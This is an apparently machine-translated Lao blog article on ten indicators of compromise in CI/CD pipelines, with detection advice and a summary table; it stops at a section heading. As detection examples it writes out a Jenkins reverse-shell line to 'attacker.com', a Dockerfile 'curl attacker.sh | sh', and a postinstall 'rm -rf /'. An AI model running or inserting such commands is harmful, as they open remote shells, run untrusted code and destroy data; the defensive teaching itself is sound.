ບົດນຳ: ຕົວຊີ້ວັດຂອງການປະນີປະນອມໃນຄວາມປອດໄພທາງໄຊເບີແມ່ນຫຍັງ?
ຕົວຊີ້ບອກຂອງການປະນີປະນອມແມ່ນສັນຍານເຕືອນໄພທຳອິດທີ່ສະແດງໃຫ້ເຫັນວ່າລະບົບຂອງທ່ານ ຫຼື pipeline ອາດຈະຢູ່ພາຍໃຕ້ການໂຈມຕີ. ເວົ້າງ່າຍໆ, ຕົວຊີ້ວັດຂອງການປະນີປະນອມ ແມ່ນຮ່ອງຮອຍທີ່ຜູ້ໂຈມຕີປະໄວ້, ຄືກັບເລື່ອງແປກໆ logins, ການປ່ຽນແປງໄຟລ໌, ຫຼື ມັນແວທີ່ເຊື່ອງໄວ້. ໃນ ຄວາມປອດໄພທາງໄຊເບີຂອງ IOC, ພວກມັນເຮັດໜ້າທີ່ຄືກັບລາຍນິ້ວມືຢູ່ບ່ອນເກີດເຫດ, ເຊິ່ງໃຫ້ຫຼັກຖານທີ່ຊັດເຈນວ່າມີບາງຢ່າງຜິດປົກກະຕິ. ດັ່ງນັ້ນ, ເມື່ອນັກພັດທະນາຖາມ ຕົວຊີ້ວັດຂອງການປະນີປະນອມແມ່ນຫຍັງ, ຄຳຕອບບໍ່ໄດ້ຈຳກັດພຽງແຕ່ເຊີບເວີ ຫຼື ໄຟວໍ, ມັນຍັງລວມເຖິງຄວາມສ່ຽງທີ່ເຊື່ອງໄວ້ໃນຍຸກສະໄໝໃໝ່ CI/CD pipelines.
ໃນເຫຼົ່ານີ້ pipelines, ຜູ້ໂຈມຕີສາມາດດັດແປງລະຫັດ, ສົ່ງ dependencies ທີ່ເປັນອັນຕະລາຍ, ຫຼືປ່ຽນແປງຂັ້ນຕອນການສ້າງໂດຍທີ່ບໍ່ມີໃຜສັງເກດເຫັນ. ຢ່າງໃດກໍຕາມ, ຄູ່ມືສ່ວນໃຫຍ່ຍັງສຸມໃສ່ພຽງແຕ່ເຊີບເວີ ຫຼື ເຄືອຂ່າຍເທົ່ານັ້ນ. ດັ່ງນັ້ນ, ລະບົບຕ່ອງໂສ້ການສະໜອງຊອບແວໄດ້ກາຍເປັນໜຶ່ງໃນເປົ້າໝາຍທີ່ງ່າຍທີ່ສຸດ.
ນັ້ນແມ່ນເຫດຜົນທີ່ວ່າການຊອກຫາຕົວຊີ້ບອກຂອງການປະນີປະນອມໃນ CI/CD pipelines ແມ່ນສິ່ງຈຳເປັນ. ເໜືອສິ່ງອື່ນໃດ, ມັນຊ່ວຍໃຫ້ທີມງານສະກັດກັ້ນມັນແວ, ປົກປ້ອງຄວາມລັບ ແລະ ຮັບປະກັນທຸກຂັ້ນຕອນຂອງການຈັດສົ່ງຊອບແວ.
10 ຕົວຊີ້ວັດອັນດັບຕົ້ນໆຂອງການປະນີປະນອມໃນ CI/CD Pipelines
ເມື່ອອະທິບາຍເຖິງຕົວຊີ້ບອກຂອງການປະນີປະນອມ, ລາຍຊື່ສ່ວນໃຫຍ່ແມ່ນສຸມໃສ່ເຊີບເວີ ຫຼື ເຄືອຂ່າຍ. ເຖິງຢ່າງໃດກໍ່ຕາມ, ໃນ CI/CD pipelines, ຜູ້ໂຈມຕີປະໄວ້ລາຍນິ້ວມືທີ່ແຕກຕ່າງກັນຫຼາຍ. ການຮັບຮູ້ສັນຍານເຫຼົ່ານີ້ແມ່ນມີຄວາມສໍາຄັນຫຼາຍສໍາລັບການປ້ອງກັນຢ່າງຕັ້ງໜ້າ. ຂ້າງລຸ່ມນີ້ແມ່ນ 10 ສັນຍານເຕືອນໄພຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ທີ່ນັກພັດທະນາ ແລະ ວິສະວະກອນຄວາມປອດໄພທຸກຄົນຄວນລະວັງ.
1. ການປ່ຽນແປງການເພິ່ງພາອາໄສທີ່ໜ້າສົງໄສ
ໜຶ່ງໃນຕົວຊີ້ວັດຫຼັກຂອງການປະນີປະນອມໃນ pipelines ເປັນການອັບເດດການເພິ່ງພາອາໄສທີ່ກະທັນຫັນ ແລະ ແປກປະຫຼາດ. ຜູ້ໂຈມຕີມັກໃຊ້ຄວາມໄວ້ວາງໃຈທີ່ນັກພັດທະນາວາງໄວ້ໃນຕົວຈັດການແພັກເກດເພື່ອເພີ່ມແພັກເກດທີ່ເປັນອັນຕະລາຍ.
ຕົວຢ່າງ, ໃນ npm a package.json diff ອາດຈະປະກອບມີ:
ການປ່ຽນແປງດັ່ງກ່າວອາດເບິ່ງຄືວ່າປອດໄພແຕ່ສາມາດສັກລະຫັດທີ່ຖືກກວດພົບວ່າເປັນໂຣກໂທຣຈັນເຂົ້າໄປໃນທຸກໆ build.
ຜົນກະທົບ: ການສ້າງທີ່ຖືກລະເມີດຈະສືບທອດມັນແວທີ່ຕົ້ນກຳເນີດ.
ການຊອກຄົ້ນຫາ: ບັງຄັບໃຊ້ການທົບທວນການເພິ່ງພາອາໄສ, ຕິດຕາມຄວາມແຕກຕ່າງຂອງໄຟລ໌ລັອກ, ແລະສະແກນແພັກເກດໃໝ່ຕະຫຼອດເວລາ.
2. ລະຫັດທີ່ສັບສົນໃນ Builds
ຜູ້ຂຽນມັລແວຣ໌ອາໄສການປິດບັງເພື່ອຫຼີກລ່ຽງການທົບທວນຄືນ. ດັ່ງນັ້ນ, ຕົວຊີ້ວັດນີ້ຂອງການປະນີປະນອມໃນ CI/CD pipelines ສາມາດເປັນໜຶ່ງໃນສິ່ງທີ່ຈັບໄດ້ຍາກທີ່ສຸດ. ໃນຄວາມເປັນຈິງ, payload ທີ່ຖືກປິດບັງມັກຈະເລື່ອນເຂົ້າໄປໃນຫ້ອງສະໝຸດແຫຼ່ງເປີດ ຫຼື ຮູບພາບ container ໂດຍບໍ່ໄດ້ແຈ້ງໃຫ້ຊາບລ່ວງໜ້າ.
ຍົກຕົວຢ່າງ:
- ຊຸດ PyPI ໂດຍໃຊ້
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - ຮູບພາບ Docker ທີ່ເຕັມໄປດ້ວຍໄບນາຣີ UPX ທີ່ບໍ່ຈຳເປັນ.
- JavaScript ເຕັມໄປດ້ວຍ
\x41\x42ຫຼົບໜີຈາກຜູ້ລັກຂໍ້ມູນປະຈຳຕົວ.
ຜົນກະທົບ: ລະຫັດທີ່ເຊື່ອງໄວ້ຈະປະຕິບັດຢ່າງງຽບໆໃນລະຫວ່າງການສ້າງ ຫຼື ເວລາແລ່ນ, ເຊິ່ງເຮັດໃຫ້ສິ່ງນີ້ເປັນສັນຍານທີ່ສຳຄັນໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC.
ການຊອກຄົ້ນຫາ: ສົມທົບ SAST ດ້ວຍການສະແກນມັລແວຣ໌ເພື່ອໝາຍລະຫັດທີ່ຖືກເຂົ້າລະຫັດ ຫຼື ລະຫັດທີ່ຖືກຫຸ້ມຫໍ່. ເໜືອສິ່ງອື່ນໃດ, ໃຫ້ຖືວ່າການປິດບັງຂໍ້ມູນເປັນສັນຍານເຕືອນໄພທີ່ສົມຄວນໄດ້ຮັບການສືບສວນຕື່ມອີກ.
3. ຄວາມລັບທີ່ຖືກເປີດເຜີຍໃນ Git: ຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ແບບຄລາສສິກ
CI/CD pipelineມັກຈະສືບທອດຄວາມລັບໂດຍກົງຈາກບ່ອນເກັບມ້ຽນ. ຢ່າງໃດກໍຕາມ, ເມື່ອຄວາມລັບປາກົດຢູ່ໃນ Git, ພວກມັນກາຍເປັນໜຶ່ງໃນຄຳຕອບທີ່ຊັດເຈນທີ່ສຸດຕໍ່ຄຳຖາມທີ່ວ່າ "ຕົວຊີ້ວັດຂອງການປະນີປະນອມແມ່ນຫຍັງ pipeline"ເມື່ອຂໍ້ມູນປະຈຳຕົວລົງໃນ Git, ຜູ້ໂຈມຕີສາມາດນຳໃຊ້ປະໂຫຍດຈາກຂໍ້ມູນເຫຼົ່ານັ້ນໄດ້ຢ່າງບໍ່ມີກຳນົດ."
ຍົກຕົວຢ່າງ:
- A
.envໄຟລ໌ທີ່ປະກອບດ້ວຍAWS_SECRET_KEY=. - ໂທເຄັນຖືກຍູ້ເຂົ້າມາ
config.json. - ຄວາມລັບຍັງຄົງເບິ່ງເຫັນໄດ້ໃນປະຫວັດ Git ເຖິງແມ່ນວ່າຈະຖືກລຶບອອກແລ້ວກໍຕາມ.
ຜົນກະທົບ: ກະແຈທີ່ເປີດເຜີຍຊ່ວຍໃຫ້ຜູ້ໂຈມຕີສາມາດເຂົ້າເຖິງໄດ້ໂດຍກົງ CI/CD pipelines, ລະບົບຄລາວ, ຫຼືຖານຂໍ້ມູນ. ດັ່ງນັ້ນ, ນີ້ແມ່ນໜຶ່ງໃນຕົວຊີ້ບອກທີ່ອັນຕະລາຍທີ່ສຸດຂອງການປະນີປະນອມ.
ການຊອກຄົ້ນຫາ: ການນໍາໃຊ້ pre-commit hooks ແລະວຽກ CI ສຳລັບການສະແກນລັບ, ແລະຍົກເລີກກະແຈທີ່ຮົ່ວໄຫຼທັນທີ. ນອກຈາກນັ້ນ, ໃຫ້ບັງຄັບໃຊ້ການແກ້ໄຂອັດຕະໂນມັດເພື່ອຫຼຸດຜ່ອນໄລຍະເວລາການເປີດເຜີຍ.
4. ຖືກແຝງ Pipeline ການຕັ້ງຄ່າ: ຕົວຊີ້ບອກທີ່ເຊື່ອງໄວ້ຂອງການປະນີປະນອມ
Pipeline configs ແມ່ນເປົ້າໝາຍທີ່ມີມູນຄ່າສູງເພາະວ່າ ການດັດແປງພຽງຄັ້ງດຽວມັກຈະເຮັດໃຫ້ຂະບວນການເຮັດວຽກທັງໝົດເສຍຫາຍ. ດັ່ງນັ້ນ, ຈຶ່ງຖືກດັດແປງ pipeline ໄຟລ໌ຕ່າງໆແມ່ນຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີທີ່ສຳຄັນຂອງ IOC ທີ່ເຄື່ອງມືຕິດຕາມກວດກາແບບດັ້ງເດີມບໍ່ຄ່ອຍກວດພົບ.
ຍົກຕົວຢ່າງ:
ການກະທຳໃນ GitHub:
- ໃນ GitLab: ມີວຽກທີ່ເປັນອັນຕະລາຍຖືກເພີ່ມເຂົ້າໃນ
.gitlab-ci.ymlທີ່ຖິ້ມຂໍ້ມູນທີ່ລະອຽດອ່ອນ. - ໃນ Jenkins:
sh "nc -e /bin/bash attacker.com 4444".
ຜົນກະທົບ: ການປ່ຽນແປງທີ່ບໍ່ໄດ້ຮັບການອະນຸມັດເຫຼົ່ານີ້ຈະປ່ຽນທ່ານ pipeline ເຂົ້າໄປໃນປະຕູຫລັງຖາວອນສຳລັບຜູ້ໂຈມຕີ, ເຊິ່ງນັບເປັນຕົວຊີ້ບອກຢ່າງຈະແຈ້ງວ່າການປະນີປະນອມ.
ການຊອກຄົ້ນຫາ: ບັງຄັບໃຊ້ການຕັ້ງຄ່າທີ່ໄດ້ເຊັນແລ້ວ, ຮຽກຮ້ອງໃຫ້ມີການອະນຸມັດ PR, ແລະ ຕິດຕາມກວດກາວຽກທີ່ບໍ່ຄາດຄິດ. ນອກຈາກນັ້ນ, ຕັ້ງຄ່າ guardrails ທີ່ບລັອກຂະບວນການເຮັດວຽກທີ່ຖືກປ່ຽນແປງໂດຍອັດຕະໂນມັດ.
5. ສິດທິພິເສດ IaC ຄ່າເລີ່ມຕົ້ນ
ນິຍາມໂຄງສ້າງພື້ນຖານທີ່ຖືກຕັ້ງຄ່າບໍ່ຖືກຕ້ອງມັກຈະສ້າງປະຕູຫຼັງທີ່ເຊື່ອງໄວ້. ດັ່ງນັ້ນ, ຄ່າເລີ່ມຕົ້ນທີ່ມີສິດທິພິເສດໃນ IaC ແມ່ນຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ແບບຄລາສສິກ.
ຍົກຕົວຢ່າງ:
- pods ການອະນຸຍາດການນຳໃຊ້ Kubernetes
privileged: true. - ຕາຕະລາງ Helm ເປີດເຜີຍການບໍລິການດ້ວຍ
0.0.0.0:22.
ຜົນກະທົບ: ຜູ້ໂຈມຕີໄດ້ຮັບການເຂົ້າເຖິງລະດັບຮາກຖານ ຫຼື ເປີດເຜີຍການບໍລິການພາຍໃນຕໍ່ສາທາລະນະ. ດັ່ງນັ້ນ, ບັນຫາເຫຼົ່ານີ້ຈຶ່ງຂະຫຍາຍພື້ນທີ່ການໂຈມຕີຢ່າງຫຼວງຫຼາຍ.
ການຊອກຄົ້ນຫາ: ສະຫມັກຂໍເອົາ IaC ການສະແກນເພື່ອບັງຄັບໃຊ້ສິດທິພິເສດໜ້ອຍທີ່ສຸດກ່ອນການລວມເຂົ້າກັນ. ນອກຈາກນັ້ນ, ໃຫ້ແນ່ໃຈວ່າການຕັ້ງຄ່າທຸກຢ່າງຖືກທົບທວນຄືນເປັນສ່ວນໜຶ່ງຂອງ pipeline.
6. ພຶດຕິກຳການກໍ່ສ້າງທີ່ຜິດປົກກະຕິ
ຜູ້ໂຈມຕີມັກຈະປ່ຽນແປງ pipeline ພຶດຕິກຳທີ່ຈະເລື່ອນການກະທຳທີ່ເປັນອັນຕະລາຍ. ເວົ້າອີກຢ່າງໜຶ່ງ, ກິດຈະກຳການກໍ່ສ້າງທີ່ຜິດປົກກະຕິແມ່ນໜຶ່ງໃນຄຳຕອບທີ່ຊັດເຈນທີ່ສຸດຕໍ່ສິ່ງທີ່ເປັນຕົວຊີ້ບອກຂອງການປະນີປະນອມໃນ CI/CD pipelines.
ຍົກຕົວຢ່າງ:
- Builds ກຳລັງສ້າງການຮ້ອງຂໍເຄືອຂ່າຍອອກໄປຫາໂດເມນແປກໆ.
- ໂຄງການ Node.js ເຮັດໃຫ້ເກີດ PowerShell ຢ່າງກະທັນຫັນໃນລະຫວ່າງ
npm install. - ວຽກ CI ກຳລັງດາວໂຫຼດໄຟລ໌ໄບນາຣີຂະໜາດໃຫຍ່ທີ່ບໍ່ໄດ້ກຳນົດໄວ້ໃນສະຄຣິບສ້າງ.
ຜົນກະທົບ: ການສ້າງທີ່ຖືກໂຈມຕີສາມາດເຮັດໜ້າທີ່ເປັນຈຸດແຈກຢາຍມັລແວຣ໌ໄດ້. ເໜືອສິ່ງອື່ນໃດ, ພວກມັນແຜ່ກະຈາຍຂໍ້ມູນອັນຕະລາຍໄປທົ່ວທຸກໆການນຳໃຊ້.
ການຊອກຄົ້ນຫາ: ຕິດຕາມບັນທຶກການສ້າງສຳລັບຂະບວນການ ຫຼື ການເຊື່ອມຕໍ່ທີ່ບໍ່ຄາດຄິດ. ນອກຈາກນັ້ນ, ຕັ້ງຄ່າການກວດຫາຄວາມຜິດປົກກະຕິເພື່ອໝາຍພຶດຕິກຳທີ່ຢູ່ນອກເໜືອຈາກມາດຕະຖານ.
7. ສະຄຣິບແພັກເກດທີ່ເປັນອັນຕະລາຍເປັນຄວາມສ່ຽງດ້ານຄວາມປອດໄພທາງໄຊເບີຂອງ IOC
ຜູ້ຈັດການແພັກເກດສະໜັບສະໜູນວົງຈອນຊີວິດ hooks ທີ່ຜູ້ໂຈມຕີໃຊ້ປະໂຫຍດຈາກ. ດັ່ງນັ້ນ, ສະຄຣິບທີ່ເປັນອັນຕະລາຍໃນ npm, PyPI, ຫຼື Dockerfiles ແມ່ນຕົວຊີ້ບອກທີ່ເຂັ້ມແຂງຂອງການປະນີປະນອມ.
ຍົກຕົວຢ່າງ:
- npm:
postinstallການແລ່ນສະຄຣິບrm -rf /ຫຼືສັນຍານໄປຫາ C2. - PyPI:
setup.pyການປະຕິບັດລະຫັດ Python ທີ່ເຊື່ອງໄວ້ໃນເວລາຕິດຕັ້ງ. - Dockerfile:
RUN curl attacker.sh | sh.
ຜົນກະທົບ: ການໂຈມຕີຈະເກີດຂຶ້ນໃນລະຫວ່າງການຕິດຕັ້ງ, ກ່ອນການທົດສອບເວລາເຮັດວຽກໃດໆ. ດັ່ງນັ້ນ, ນັກພັດທະນາອາດຈະບໍ່ສັງເກດເຫັນຈົນກວ່າມັນຈະສາຍເກີນໄປ.
ການຊອກຄົ້ນຫາ: ສະແກນລາຍການໂປຣແກຣມຂອງແພັກເກດສຳລັບສະຄຣິບຕິດຕັ້ງ. ນອກຈາກນັ້ນ, ຈຳກັດຄວາມສ່ຽງ hooks in CI/CD ວຽກເພື່ອຫຼຸດຜ່ອນການສຳຜັດ.
8. ຕົວຊີ້ບອກການເປັນພິດຂອງທະບຽນຂອງການປະນີປະນອມ
ຜູ້ໂຈມຕີປ່ຽນແທນ ຫຼື ດັດແປງສິ່ງປະດິດໃນການລົງທະບຽນ, ແລະ ເຫດການເຫຼົ່ານີ້ແມ່ນຕົວຢ່າງຂອງຕົວຊີ້ບອກເຖິງການປະນີປະນອມໃນລະບົບຕ່ອງໂສ້ການສະໜອງ. pipelines.
ຍົກຕົວຢ່າງ:
- ແທັກຮູບພາບ Docker ໄດ້ອັບເດດຢ່າງງຽບໆດ້ວຍຊັ້ນທີ່ຖືກກວດພົບວ່າເປັນໂຣກໂທຣຈັນ.
- ຊຸດພາຍໃນໄດ້ຖືກປ່ຽນແທນດ້ວຍລຸ້ນທີ່ເປັນພິດ.
- ການຫຍໍ້ລົງຂອງ namespace npm ເຊັ່ນ:
lodash-proxy.
ຜົນກະທົບ: ທຸກໆການສ້າງທີ່ໃຊ້ສິ່ງປະດິດຂອງ registry ຈະຖືກໂຈມຕີ. ບໍ່ພຽງແຕ່ເທົ່ານັ້ນ, ແຕ່ການຂົ່ມຂູ່ຍັງແຜ່ລາມໄປສູ່ການບໍລິການຊັ້ນລຸ່ມ.
ການຊອກຄົ້ນຫາ: ບັງຄັບໃຊ້ການກວດສອບລາຍເຊັນ ແລະ ຄວາມສົມບູນໃນການດຶງຂໍ້ມູນຈາກລີຈິສຕຣີທັງໝົດ. ນອກຈາກນັ້ນ, ຕິດຕາມຕົ້ນກຳເນີດຂອງສິ່ງປະດິດດ້ວຍ SBOM ການກວດສອບ.
9. ກິດຈະກຳຂອງຜູ້ໃຊ້ທີ່ຜິດປົກກະຕິເປັນຫຼັກຖານຂອງ IOC
ບັນຊີທີ່ຖືກໂຈມຕີເກືອບຈະປະໄວ້ຮ່ອງຮອຍທີ່ຜິດປົກກະຕິຢູ່ເບື້ອງຫຼັງ. ດັ່ງນັ້ນ, ພຶດຕິກຳທີ່ຜິດປົກກະຕິຂອງນັກພັດທະນາຈຶ່ງເປັນຕົວຊີ້ບອກທີ່ເຂັ້ມແຂງຂອງການປະນີປະນອມ.
ຍົກຕົວຢ່າງ:
- Commits ຖືກຍູ້ໃນເວລາ 3 ໂມງເຊົ້າຕາມເວລາທ້ອງຖິ່ນ.
- ການອະນຸມັດ PR ໂດຍບັນຊີໃນຊ່ວງວັນພັກ.
- Pipelines ຖືກກະຕຸ້ນດ້ວຍຄວາມຖີ່ຜິດປົກກະຕິ.
ຜົນກະທົບ: ຜູ້ໂຈມຕີໃຊ້ຂໍ້ມູນປະຈຳຕົວທີ່ຖືກລັກໄປໃນທາງທີ່ຜິດເພື່ອໃສ່ການປ່ຽນແປງທີ່ເປັນອັນຕະລາຍ. ຫຼັງຈາກທີ່ທັງໝົດ, ບໍ່ໄດ້ຮັບອະນຸຍາດ commits ປະສົມປະສານເຂົ້າກັບຂະບວນການເຮັດວຽກປົກກະຕິໄດ້ຢ່າງງ່າຍດາຍ.
ການຊອກຄົ້ນຫາ: ຕິດຕາມກວດກາ SCM ກິດຈະກຳສຳລັບຄວາມຜິດປົກກະຕິ, ບັງຄັບໃຊ້ MFA, ແລະ ໝູນວຽນໂທເຄັນເປັນປະຈຳ. ນອກຈາກນັ້ນ, ໃຫ້ແຈ້ງເຕືອນກ່ຽວກັບສິ່ງທີ່ໜ້າສົງໄສ commit ຫຼືຮູບແບບການອະນຸມັດ.
10. ການກວດສອບຄວາມຊື່ສັດ ຫຼື ລາຍເຊັນທີ່ລົ້ມເຫຼວໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC
ເປັນເລື່ອງທຳມະດາແຕ່ຖືກລະເລີຍ ຕົວຊີ້ວັດຂອງການປະນີປະນອມ ແມ່ນການກວດສອບຄວາມສົມບູນ ຫຼື ລາຍເຊັນທີ່ລົ້ມເຫຼວ. ໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC, ການກວດສອບເຫຼົ່ານີ້ຢືນຢັນວ່າລະຫັດ ຫຼື ສິ່ງປະດິດແມ່ນຖືກຕ້ອງ. ການຂ້າມພວກມັນຈະເຮັດໃຫ້ເກີດບັນຫາ pipelines ເປີດເຜີຍ.
ຕົວຢ່າງ:
- ແຮຊ SHA256 ບໍ່ກົງກັບ checksum ທີ່ຄາດໄວ້.
- ລາຍເຊັນ GPG ທີ່ຂາດຫາຍໄປ ຫຼື ບໍ່ຖືກຕ້ອງ.
- An SBOM ສະແດງສິ່ງປະດິດທີ່ບໍ່ໄດ້ເຊັນ.
ຜົນກະທົບ: ຄວາມລົ້ມເຫຼວຂອງຄວາມຊື່ສັດມັກຈະໝາຍເຖິງການແຊກແຊງ, ການເປັນພິດຈາກການລົງທະບຽນ, ຫຼື ການສັກຢາມັລແວ.
ການຊອກຄົ້ນຫາ: ກວດສອບລາຍເຊັນໂດຍອັດຕະໂນມັດ, ບັງຄັບໃຊ້ການກວດສອບຄວາມຖືກຕ້ອງຂອງ checksum, ແລະບລັອກອົງປະກອບທີ່ບໍ່ໄດ້ເຊັນ. ເໜືອສິ່ງອື່ນໃດ, ໃຫ້ຖືວ່າການກວດສອບທີ່ລົ້ມເຫຼວທຸກຢ່າງເປັນຫຼັກຖານທີ່ຊັດເຈນຂອງການປະນີປະນອມ.
CI/CD ຕົວຊີ້ວັດຂອງການປະນີປະນອມໂດຍຫຍໍ້
| ຕົວຊີ້ວັດການປະນີປະນອມ (IOC) | ຜົນກະທົບໃນ CI/CD Pipelines | ວິທີການກວດພົບ |
|---|---|---|
| ການປ່ຽນແປງການເພິ່ງພາອາໄສທີ່ໜ້າສົງໄສ | ຜູ້ໂຈມຕີໄດ້ສັກຫ້ອງສະໝຸດທີ່ເປັນອັນຕະລາຍເຂົ້າໄປໃນຕົວຈັດການແພັກເກດ, ເຊິ່ງນຳໄປສູ່ການສ້າງບລັອກທີ່ຖືກໂຈມຕີ. | ຕິດຕາມຄວາມແຕກຕ່າງຂອງໄຟລ໌ລັອກ, ບັງຄັບໃຊ້ການທົບທວນການເພິ່ງພາອາໄສ, ແລະສະແກນການເພິ່ງພາອາໄສຢ່າງຕໍ່ເນື່ອງ. |
| ລະຫັດທີ່ສັບສົນໃນ Builds | payloads ທີ່ເຊື່ອງໄວ້ຈະປະຕິບັດໃນລະຫວ່າງການສ້າງ ຫຼື ເວລາແລ່ນໂດຍບໍ່ມີການກວດພົບ. | ການນໍາໃຊ້ SAST ແລະ ການສະແກນມັນແວເພື່ອສະແດງຮູບແບບລະຫັດ base64, hex, ຫຼື packed. |
| ຄວາມລັບທີ່ຖືກເປີດເຜີຍໃນ Git | ໂທເຄັນ ຫຼື ລະຫັດ API ທີ່ຮົ່ວໄຫຼໃຫ້ຜູ້ໂຈມຕີເຂົ້າເຖິງລະບົບທີ່ສຳຄັນໄດ້ໂດຍກົງ. | ດໍາເນີນການສະແກນລັບໃນ Git hooks ແລະ ຍົກເລີກຂໍ້ມູນປະຈຳຕົວທີ່ຮົ່ວໄຫຼໂດຍອັດຕະໂນມັດ. |
| ຖືກແຝງ Pipeline Configurations | ຂັ້ນຕອນການເຮັດວຽກທີ່ໄດ້ຮັບການດັດແປງອະນຸຍາດໃຫ້ມີການກັ່ນຕອງຂໍ້ມູນ ຫຼື ການຄົງຢູ່ພາຍໃນ CI/CD. | ຮຽກຮ້ອງໃຫ້ມີການອະນຸມັດ PR, ບັງຄັບໃຊ້ການຕັ້ງຄ່າທີ່ໄດ້ລົງນາມແລ້ວ, ແລະ ຕິດຕາມກວດກາ pipeline ປ່ຽນແປງ. |
| ສິດທິພິເສດ IaC ຄ່າເລີ່ມຕົ້ນ | ພາລະບົດບາດທີ່ອະນຸຍາດຫຼາຍເກີນໄປ ຫຼື ຄ່າເລີ່ມຕົ້ນທີ່ບໍ່ປອດໄພຈະເປີດເຜີຍສະພາບແວດລ້ອມຄລາວ. | ສະແກນໄຟລ໌ Terraform, Kubernetes, ແລະ Helm ສຳລັບການບັງຄັບໃຊ້ສິດທິພິເສດໜ້ອຍທີ່ສຸດ. |
| ພຶດຕິກຳການສ້າງທີ່ຜິດປົກກະຕິ | Pipelineໃຊ້ເປັນຈຸດແຈກຢາຍມັນແວ ຫຼື ສຳລັບການເຄື່ອນໄຫວທາງຂ້າງ. | ວິເຄາະບັນທຶກການສ້າງສຳລັບການດາວໂຫຼດ, ຂະບວນການ ຫຼື ການໂທອອກທີ່ບໍ່ຄາດຄິດ. |
| ສະຄຣິບແພັກເກດທີ່ເປັນອັນຕະລາຍ | ສະຄຣິບກ່ອນ/ຫຼັງການຕິດຕັ້ງທີ່ເຊື່ອງໄວ້ຈະກະຕຸ້ນ payloads ກ່ອນການທົດສອບ runtime. | ບລັອກສະຄຣິບ npm/PyPI ທີ່ມີຄວາມສ່ຽງ ແລະ ຈຳກັດການປະຕິບັດໃນ CI/CD ວຽກ. |
| ການເປັນພິດຈາກການລົງທະບຽນ | ສິ່ງປະດິດທີ່ຖືກ Trojanized ປ່ຽນແທນຮູບພາບທີ່ເຊື່ອຖືໄດ້ ຫຼື ໄບນາຣີໃນ registry. | ກວດສອບ checksums, ບັງຄັບໃຊ້ການກວດສອບລາຍເຊັນ, ແລະສະແກນລີຈິສຕຣີຢ່າງມີປະສິດທິພາບ. |
| ກິດຈະກຳຂອງຜູ້ໃຊ້ທີ່ຜິດປົກກະຕິ | ບັນຊີທີ່ຖືກບຸກລຸກສົ່ງຜົນກະທົບທາງລົບ commits ຫຼື ຕົວກະຕຸ້ນ pipelines. | ບັງຄັບໃຊ້ MFA, ຕິດຕາມກວດກາ commitສຳລັບຄວາມຜິດປົກກະຕິ, ແລະວິເຄາະ login ຮູບແບບ. |
| ການກວດສອບຄວາມຊື່ສັດ ຫຼື ລາຍເຊັນລົ້ມເຫຼວ | ຊີ້ບອກລະຫັດ, ການເພິ່ງພາອາໄສ ຫຼື ຮູບພາບທີ່ຖືກດັດແປງ pipeline. | ກວດສອບຄວາມສົມບູນໂດຍອັດຕະໂນມັດ ແລະ ບລັອກອົງປະກອບທີ່ບໍ່ໄດ້ເຊັນ ຫຼື ບໍ່ກົງກັນ. |
ເປັນຫຍັງຄວາມປອດໄພທາງໄຊເບີແບບດັ້ງເດີມຂອງ IOC ຈຶ່ງພາດ CI/CD ຄວາມສ່ຽງ
ອົງກອນສ່ວນໃຫຍ່ໄດ້ຕິດຕາມກວດກາຕົວຊີ້ວັດການປະນີປະນອມໃນເຊີບເວີ, ຄອມພິວເຕີ ຫຼື ເຄືອຂ່າຍແລ້ວ. ເຖິງຢ່າງໃດກໍ່ຕາມ, ວິທີການແບບຄລາສສິກນີ້ຕໍ່ກັບຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ບໍ່ສົນໃຈ CI/CD pipelines, ເຊິ່ງປະຈຸບັນນີ້ແມ່ນໜຶ່ງໃນໜ້າການໂຈມຕີທີ່ສຳຄັນທີ່ສຸດ. ໃນຄວາມເປັນຈິງ, pipelineສະແດງສັນຍານປະນີປະນອມທີ່ເປັນເອກະລັກທີ່ເຄື່ອງມືແບບດັ້ງເດີມບໍ່ສາມາດກວດພົບໄດ້.
ຕົວຊີ້ວັດຂອງການປະນີປະນອມໃນຄວາມໝັ້ນຄົງແບບດັ້ງເດີມ
ໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC ແບບທຳມະດາ, ຈຸດສຸມມັກຈະຢູ່ທີ່:
- ຜິດປົກກະຕິ loginຫຼື ທີ່ຢູ່ IP ທີ່ຊີ້ບອກເຖິງຂໍ້ມູນປະຈຳຕົວທີ່ຖືກລັກ.
- ແຮຊໄຟລ໌ ຫຼື ການປ່ຽນແປງໃນລີຈິດສະຕິກທີ່ໜ້າສົງໄສທີ່ເປີດເຜີຍມັລແວ.
- ການຈະລາຈອນອອກທີ່ບໍ່ຄາດຄິດທີ່ຊີ້ບອກເຖິງການລັກລອບຂໍ້ມູນ.
ເຫຼົ່ານີ້ແມ່ນຕົວຊີ້ວັດທີ່ຮູ້ຈັກກັນດີທີ່ຕິດຕາມຢູ່ໃນ MITER ATT&CK framework, ເຊິ່ງສະແດງພຶດຕິກຳ ແລະ ຍຸດທະວິທີທີ່ຄ້າຍຄືນກັນທົ່ວໄປຂອງສັດຕູ. ສິ່ງເຫຼົ່ານີ້ແມ່ນສັນຍານທີ່ເປັນປະໂຫຍດ. ຢ່າງໃດກໍຕາມ, ພວກມັນໃຊ້ກັບລະບົບປະຕິບັດການ ຫຼື ເຄືອຂ່າຍຂອງບໍລິສັດເປັນສ່ວນໃຫຍ່. ດັ່ງນັ້ນ, ພວກມັນຈຶ່ງພາດການແຊກແຊງທີ່ລະອຽດອ່ອນທີ່ເກີດຂຶ້ນກ່ອນໜ້ານີ້ໃນລະບົບຕ່ອງໂສ້ການສະໜອງຊອບແວ.
ເປັນຫຍັງ CI/CD Pipelines ມີຄວາມແຕກຕ່າງກັນ
